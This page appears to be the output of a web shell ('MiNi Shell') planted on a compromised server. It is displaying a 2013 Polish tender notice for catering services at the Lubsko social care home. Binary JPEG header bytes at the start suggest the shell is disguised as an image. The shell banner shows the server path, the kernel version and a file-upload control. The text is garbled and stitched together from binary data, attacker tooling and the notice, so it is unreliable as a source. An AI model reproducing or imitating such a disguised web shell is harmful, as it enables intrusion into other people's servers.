JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131213/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131213/271461-N-2013.html

<p class="kh_header"><b>Lubsko: ŚWIADCZENIE CODZIENNEGO I CAŁODOBOWEGO  ŻYWIENIA
133  PENSJONARIUSZY DPS LUBSKO NA BAZIE WYNAJMOWANYCH  POMIESZCZEŃ KUCHNI  I  WYPOSAŻENIA KUCHNI  
PRZEZ  OKRES  12  MIESIĘCY  2014r.</b><br>
<b>Numer ogłoszenia: 271461 - 2013; data zamieszczenia: 13.12.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , ul. Zamkowa 27, 68-300 Lubsko, woj. lubuskie, tel. 068 4574111, faks 068 4574110.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka organizacyjna powiatu.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE CODZIENNEGO I CAŁODOBOWEGO  ŻYWIENIA
133  PENSJONARIUSZY DPS LUBSKO NA BAZIE WYNAJMOWANYCH  POMIESZCZEŃ KUCHNI  I  WYPOSAŻENIA KUCHNI  
PRZEZ  OKRES  12  MIESIĘCY  2014r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa codziennego i całodobowego żywienia 133 pensjonariuszy Domu Pomocy Społecznej świadczona na bazie wynajętych od DPS Lubsko  pomieszczeń  kuchennych  i wyposażenia  obejmująca  produkcję i wydawanie przez okres 12 miesięcy: 
Śniadania    48545 (porcji)
obiady         48545  (porcji)
kolacje         48545  (porcji)
(wyliczone : 133osób/dzień x 365 dni  =  48545  porcji)
Liczba ta może się zmienić, gdyż jest zależna od stanu chorobowego mieszkańców i stanu obłożenia Domu.
Usługa obejmuje cały kompleks spraw związanych  z prowadzeniem kuchni w tym przejęcie pełnej odpowiedzialności za pracowników, produkcję,  jej jakość, stan higieniczno-sanitarny pomieszczeń i urządzeń, prowadzenie dokumentacji HACCP, kontakty z Sanepidem, mycie naczyń ze stołówki, itp. Wykonawca zobowiązany jest do przestrzegania wszystkich aktualnych przepisów prawnych obowiązujących w polskim systemie prawnym  w tym zakresie. 
Wykonawca zobowiązany jest do pobierania próbek żywnościowych sporządzanych produktów i przechowywania ich przez 48 godzin dla kontroli przez Sanepid. 
Zamawiający  ma  prawo  - poprzez  upoważnionego  przedstawiciela - do kontrolowania produkcji posiłków ( m.in.: jakości produktów wyjściowych, świadectwa jakości ich pochodzenia,  składu i gramatury posiłków, czystości personelu i posiadania przez nich aktualnych książeczek zdrowia, czystości pomieszczeń i wyposażenia kuchni, zużycia mediów, bhp. i p.poż. - według porozumienia , itd.)
Zamawiający będzie dostarczał Wykonawcy  pisemny wykaz ilości mieszkańców oraz wymaganych diet w terminach:
obiady i kolacje do godziny 9.00   tego samego dnia,
śniadania do godz. 16.00 dnia poprzedniego.
Wyżywienie musi spełniać wymóg dostarczenia 2200-2400 kalorii dziennie dla jednej osoby. Posiłki mają być przygotowane ze świeżych produktów  własnych ( nabywanych przez wykonawcę). Posiłki mają być urozmaicone poprzez przestrzeganie piramidy żywieniowej  i muszą odpowiadać wszelkim rygorom recepturowym, smakowym, estetycznym i odżywczym ( w posiłkach mają być warzywa, owoce i słodycze ).
Minimalna wysokość całodobowego wsadu surowca na jednego żywionego nie może być mniejsza niż 7,00 zł ( słownie: siedem złotych) brutto, liczona jako średnia z 12 miesięcy roku . Wsad surowca oznacza cenę  zakupu  wszelkich produktów przeznaczonych do przerobienia lub bezpośredniego spożycia przez  mieszkańców zgodnie z jadłospisem.  Wykonawca będzie przedkładał Zamawiającemu bez wezwania kwartalne rozliczenie wysokości wsadu na 1 mieszkańca,  liczone jako średnia z  3-ch  miesięcy danego kwartału. Nie  stosowanie się wykonawcy  do tego zapisu  jest podstawą  do  jednostronnego  rozwiązania umowy żywienia z przyczyn leżących po stronie wykonawcy.   
Na całodobowe wyżywienie składają się posiłki wydawane pensjonariuszom :
Śniadanie  na oddziałach o godz. 9.00, na stołówce w godz. 8.00-10.00,
obiad na oddziałach o godz. 13.00, na stołówce w  godz. 13.00-15.00, kolacja na oddziałach o godz. 18, na stołówce w godz. 17.00-19.00, 
dodatek cukrzycowy dla pensjonariuszy z cukrzycą wydawany tylko na oddziałach o godz. 15.00 wliczony w cenę obiadu 
z uwzględnieniem podziału na diety : 
normalna (I),
ekkostrawna (III),
lekkostrawna z dodatkiem cukrzycowym (IV),
lekkostrawna z dodatkiem cukrzycowym przecierana (V),
lekkostrawna  przecierana , 
inne w zależności od zaleceń lekarza.
Wykonawca zobowiązany jest ponadto do : 
a. zapewnienia całodziennego dostępu do pieczywa i napojów w ilości  10-ciu bochenków chleba, 7-ciu  słoiczków dżemu, 7-miu kostek masła 250g do smarowania chleba na  tydzień. Przy wyborze pieczywa nalezy uwzglednić przyzwyczajenia smakowe pensjonariuszy Domu.
b. zapewnienia dodatkowego posiłku (dodatku cukrzycowego) dla osób tego wymagających w ilości 22 osób ( może ulec zmianie).
c. w okresie letnim zapewnienie napojów chłodzących na żądanie przedstawiciela Zamawiającego  ( herbata miętowa  lub owocowa) dla 15 pracowników Domu  w ilości 1 litra  na osobę na dzień
d. umożliwienia  wydawanie odpłatnych posiłków dla personelu  zamawiającego jeżeli zaistnieje taka   sytuacja w cenie jak dla  pensjonariusza Domu
e. przygotowania tradycyjnych potraw świątecznych (na Boże Narodzenie i Wielkanoc) oraz  właściwej oprawy tych posiłków
Wykonawca będzie przygotowywał posiłki zgodnie  z zaleceniami i normami Instytutu Żywienia i Żywności w Warszawie. Zamawiający udostępnia  do stosowania  receptury na produkty żywieniowe stosowane w żywieniu  dotychczasowym  pensjonariuszy . Podstawę do sporządzania posiłków dla mieszkańców DPS stanowić będzie  uzgodniony  pomiędzy zamawiającym a wykonawcą jadłospis  dekadowy, z uwzględnieniem diet indywidualnych. Receptury mogą one być modyfikowane  wyłącznie po uzyskaniu akceptacji zamawiającego. Możliwe jest też wprowadzenie nowych potraw po zatwierdzeniu ich receptury przez zamawiającego. 
Dystrybucja posiłków : 97 pensjonariuszy  żywionych jest w budynku przy ul. Zamkowej 27  i  36 pensjonariuszy na filii DPS przy ul. Pokoju 1A. Dostarczanie posiłków do kuchenek oddziałowych odbywać się będzie transportem zamawiającego i tak :
1.   w budynku głównym przy ul. Zamkowej : 
a. na oddziały,  transport windą towarową, załadunek zbiorczy do pojemników i termosów jest czynnością wykonawcy, ilość osób około  51.
b. na stołówkę  przez okno podawcze, wydawanie pojedynczych porcji dla około 46 osób
2. do  budynku przy ul. Pokoju 1A (filia DPS) transportem zamawiającego, załadunek zbiorczy do pojemników i termosów jest czynnością wykonawcy, odbiór z kuchni, ilość dla około 36 osób. 
Posiłki gorące będą odbierane od wykonawcy w termosach i pojemnikach będących własnością zamawiającego. Temperatura posiłków w chwili dostarczenia do pomieszczeń dystrybucji  zamawiającego musi wynosić : dla zupy, drugiego dania, płynów - minimum 60st.C, dla posiłków zimnych ( sałatki, pasty, sery, itp.) od 4do7st.C.
Przygotowywanie posiłków odbywać się będzie w  kuchni Zamawiającego usytuowanej w Lubsku przy ul. Zamkowej 27 o powierzchni użytkowej wynajętej 207,70m2, oraz  wyposażenia kuchennego, przekazanych  wykonawcy usługi na podstawie umowy najmu ,  załącznik nr 2 SIWZ. Wykaz  sprzętu  i urządzeń  do przekazania dla Wykonawcy  stanowi załączniki nr 1, 2 i 3 do umowy najmu.
Dodatkowe obowiązki wykonawcy: 
1.  przejąć pracowników zamawiającego zatrudnionych w kuchni na podstawie art. 23prim Kodeksu Pracy. 
Wykaz szczegółowy  przewidzianych do przejęcia pracowników kuchni udostępniony  będzie wykonawcy po wyborze najkorzystniejszej oferty ( 4 osoby). Dla zapewnienia prawidłowej pracy kuchni potrzebne są następujące etaty, które mają być uwzględnione:  
szef kuchni -  1 osoba na pełny etat ,
kucharz -  4 osoby na pełny etat,
magazynier - 1 osoba na pełny etat,
dietetyk  - 1 osoba na 1 / 2 etatu.
2. przejmować wszelkie resztki pokarmowe jako odpady pokonsumpcyjne powstałe po spożyciu posiłków. 
Odpady  spożywcze  (produkcyjne  powstające w kuchni  i  pokonsumpcyjne  powstające na oddziałach i w stołówce)  kwalifikowane są  jako  odpady  mieszkańców. Odpady te przejmuje  firma  świadcząca  usługi żywienia mieszkańców Domu,  i  dokonuje  rozdziału  odpadów na  płynne  i odpady pozostałe ( nie płynne )  przechowuje je  w  oddzielnych pojemnikach.  Odpady  płynne  przekazuje  do  utylizacji  uprawnionej firmie zewnętrznej z którą  zawiera stosowna umowę  a  odpady  pozostałe ( nie płynne) umieszcza w  pojemniku   pcv  z napisem BIO znajdującym się na placu przy kotłowni. Do tego pojemnika nie wolno wrzucać  odpadów w workach nie biodegradowalnych. Firma świadcząca usługi żywienia mieszkańców Domu   ponosi  całkowitą  odpowiedzialność za przechowywanie i  likwidację  odpadów spożywczych.  Ryczałt  za udostępnienie pojemnika i  jego  opróżnianie w cyklu  czasowym  wyznaczonym  przez Gminę Lubsko -   50zł na m-c .
3. utrzymywać właściwy stan techniczno-sanitarny pomieszczeń, urządzeń, sprzętu, itp. wykorzystywanych  przez wykonawcę, co oznacza m.in. ich czasową konserwację, wykonywanie  bez zwłoki napraw, remontów, a w przypadku jego zużycia - zakup sprzętu nowego. Sprzęt  nowy staje się własnością  Zamawiającego.
4.  Zgodnie z art. 182 Kodeksu Pracy - współpracować z  zamawiającym w zakresie bhp. i p.poż. - na podstawie zawartego porozumienia - załącznik nr 7 do SIWZ
5.  Utrzymywać we właściwym stanie sanitarno-higienicznym korytarze  przy kuchni ( myć podłogi na bieżąco, a co najmniej raz w tygodniu szorować podłogi) . 
6. Ubezpieczyć  od odpowiedzialności cywilnej prowadzoną działalność gospodarczą  w kuchni i objąć odpowiedzialnością  pracowników kuchni i osoby  trzecie, znajdujące się w kompleksie kuchennym.
7.  Zgłosić i opłacać podatek od nieruchomości na rzecz Urzędu Miasta Lubsko, od wynajętej    powierzchni użytkowej pomieszczeń. Na rok 2014 planowana jest stawka w wysokości 21,00zł/m2.Przewidywana kwota roczna na 2014 r. wyniesie  4361,70 ZŁ.
8. Wykonawcy zezwala się na wyposażenie kuchni w  sprzęt własny ale w uzgodnieniu z zamawiającym warunków jego zasilania w media.  
9. Opłacać comiesięczny czynsz za wynajem  pomieszczeń kuchennych w wysokości  1805,40zł 
10. W przypadku rozpoczęcia działalności wykonawcy na rzecz innych podmiotów gospodarczych z wykorzystaniem pomieszczeń i sprzętu użyczonych przez zamawiającego, wykonawca zobowiązuje się  do  powiadomienia o tym zamawiającego  i  zapłaty na rzecz zamawiającego kwoty 10 zł za 1 osobę żywioną  całodziennie przez okres jednego miesiąca. Kontrakt  ten nie może pogorszyć jakości usługi świadczonej dla Zamawiającego.  
Do rozliczeń niepełnych stosuje się tu procentowe udziały  poszczególnych posiłków w stawce jednostkowej dziennej usługi ( stawce za osobo-dzień)
 a)	śniadanie stanowi 30% 
b)	obiad stanowi 50% 
c)	kolacja stanowi 20% .
Najemca będzie ponosił następujące  opłaty  z tytułu  korzystania z mediów:
a)	za energię  elektryczną - według  wskazań  podlicznika  elektrycznego  w oparciu o stawki  brutto stosowane  przez Zakład Energetyczny  w fakturowaniu   usług  i dostaw na rzecz DPS Lubsko.
b)	za zimną wodę i ścieki - według  wskazań  podliczników   w oparciu o stawki  brutto stosowane  przez  Zakład Wodociągów  w fakturowaniu   usług na rzecz DPS Lubsko.
c)	za ciepłą  wodę i ścieki - według  wskazań  podliczników   w oparciu o  stawkę za c.w. - określoną  przez DPS (  18 zł/m3) , za ścieki  w oparciu o stawkę brutto  stosowaną  przez  Zakład Wodociągów i Kanalizacji  w fakturowaniu  tych usług  na rzecz DPS Lubsko.
d)	za  gaz ziemny - według  wskazań  podlicznika  gazowego  w  oparciu  o stawki brutto   stosowane  przez Zakład Gazowniczy  w fakturowaniu   usług i  dostaw  na rzecz DPS Lubsko.
e)	za parę  technologiczną  -  ryczałt 650 zł na miesiąc za  2 kotły warzelne
f)	za pojemnik i  wywóz BIO odpadów ( niepłynnych)  - 50zł/m-c.
g)	za ogrzewanie  pomieszczeń C.O - płatne  przez cały rok ustalone jako ryczałt miesięczny w wysokości 610zł/ miesiąc..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3, 55.50.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> w formie pieniądza w wysokosci 12000zł. ; słownie : dwanaście tysiecy złotych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>metoda : spełnia  - nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>metoda : spełnia  - nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu uprawnionego do kontroli jakości potwierdzającego, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Warunek określony w pkt.III.4.1. niniejszego ogłoszenia ma dotyczyć usług wyłącznie w zakresie żywienia pensjonariuszy domu pomocy społecznej. Okres wykonywania usług żywienia pensjonariuszy krótszy od 1 roku nie będzie uznawany za spełniajacy warunek. 2. Do oferty nalezy dołaczyć dokument podpisany przez zamawiającego potwierdzający odbycie wizji lokalnej w pomieszczeniach przeznaczonych do przejecia oraz o zapoznaniu się ze stanem pomieszczeń i wyposażenia oraz, że nie wnosi zastrzeżeń co do ich stanu technicznego.3. Wykonawca złoży oświadczenie, że zapoznał się ze Specyfikacją Istotnych Warunków Zamówienia i nie wnosi  do neij zastrzezeń oraz, że zdobył konieczne informacje do przygotowania oferty. Metoda: spełnia - nie spełnia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie zmiany i uzupełnienia treści umowy wymagają dla swojej ważności formy pisemnej  w postaci aneksu. Dopuszcza się wyłącznie zmiany w zakresie adresu/siedziby Zamawiającego/ Wykonawcy, zmiany osób występujących po stronie Zamawiającego / Wykonawcy, zmianę   wynagrodzenia w związku ze zmianą stawki podatku od towarów i usług (vat). Przyczyny  dokonania zmian postanowień umowy  oraz uzasadnienie takich zmian należy opisać w  stosownych dokumentach ( notatka służbowa, pismo wykonawcy, itp.)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiatzarski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 68-300 Lubsko, ul. Zamkowa 27, Pokój Kadr..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.12.2013 godzina 10:00, miejsce: 68-300 Lubsko, ul. Zamkowa 27, Pokój Kadr..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com